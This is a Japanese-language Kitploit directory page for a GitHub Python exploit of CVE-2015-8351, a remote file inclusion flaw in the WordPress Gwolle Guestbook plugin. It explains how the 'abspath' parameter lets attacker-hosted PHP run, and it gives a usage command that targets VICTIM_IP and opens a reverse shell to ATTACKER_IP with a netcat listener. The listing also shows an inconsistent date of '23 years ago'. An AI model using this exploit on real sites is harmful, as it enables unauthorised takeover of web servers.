Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
exploit-CVE-2015-8351 — WordPress プラグイン Gwolle Guestbook 1.5.3 - リモートファイルインクルード | Kitploit
ツール/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress プラグイン Gwolle Guestbook 1.5.3 - リモートファイルインクルード

リポジトリを見る
23年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gwolle Guestbook WordPress Plugin RFI Exploit

このPythonスクリプトは、Gwolle Guestbook WordPressプラグインの重大なリモートファイルインクルード(RFI)脆弱性を悪用します。この脆弱性により、認証されていない攻撃者がリモートのPHPファイルをインクルードし、脆弱なシステム上で任意のコードを実行できる可能性があります。

脆弱性の詳細

HTTP GETパラメータ「abspath」は、PHPのrequire()関数で使用される前に適切にサニタイズされません。リモートの攻撃者は、任意のリモートサーバーから'wp-load.php'という名前のファイルをインクルードし、その内容を脆弱なWebサーバー上で実行できます。そのためには、攻撃者は悪意のある'wp-load.php'ファイルを自身のサーバーのドキュメントルートに配置し、サーバーのURLをリクエストに含める必要があります。

この脆弱性の悪用に成功すると、WordPressインストール全体の侵害につながる可能性があり、Webサーバー全体の侵害にまで発展する恐れもあります。

使用方法

このスクリプトには3つの引数が必要です:

  • ターゲットURL:脆弱なWordPressインストールのURL。
  • 攻撃者ホスト:攻撃者のマシンのIPアドレスまたはホスト名。
  • 攻撃者ポート:攻撃者がリバースシェルを待ち受けるポート番号。

例:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

注:指定されたポートで攻撃者マシンにnetcatリスナーを開いておく必要があります。

免責事項

このスクリプトは教育目的のみで提供されています。作者は、このスクリプトの誤用によって生じたいかなる損害についても責任を負いません。

ツールをダウンロード